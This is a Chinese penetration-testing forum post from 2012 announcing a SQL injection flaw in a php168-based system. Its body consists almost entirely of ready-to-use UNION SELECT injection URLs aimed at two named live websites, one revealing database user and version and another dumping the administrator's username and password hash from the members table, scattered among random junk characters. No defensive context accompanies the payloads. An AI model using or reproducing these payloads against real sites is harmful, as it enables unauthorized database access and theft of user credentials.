找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php168某系统注入漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2987|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--1 W, _8 [  ]9 @( s- d6 v- X
                                                         ! E' `: Z' U1 f/ _. N
                                       - h  }5 [: o: r  f3 c

& `2 C% m& V8 _0 _http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
5 v! m; r  ^1 L4 d& e$ H7 Z5 B                                                     , s* K# E# c& ~! f! Q1 C
                                                                  
, g  |+ U2 c- U4 E$ R                                                        
* ]; G; J6 h2 ]/ `* f0 S# Whttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
# v/ ?% H4 _( P3 }' x7 P* |- I' f9 r7 L) Q; G
6 }, v" F1 E+ y& G" v1 S

2 G) [+ R( c! G# j                                                            
4 m  g. ?- B4 v. b' G9 _ , ^0 z) U* ~' |1 F% d7 m" m
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--3 b6 N" S) v' O" U. B+ ]

* X& L5 J! y4 _2 o6 ?0 V3 P6 q& q3 t  O% U! {  I. d: K. [
2 @0 I+ ^( T# T3 |4 u
                                                                    + l, Q; W2 ~; a+ u* q
系统, database, version

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表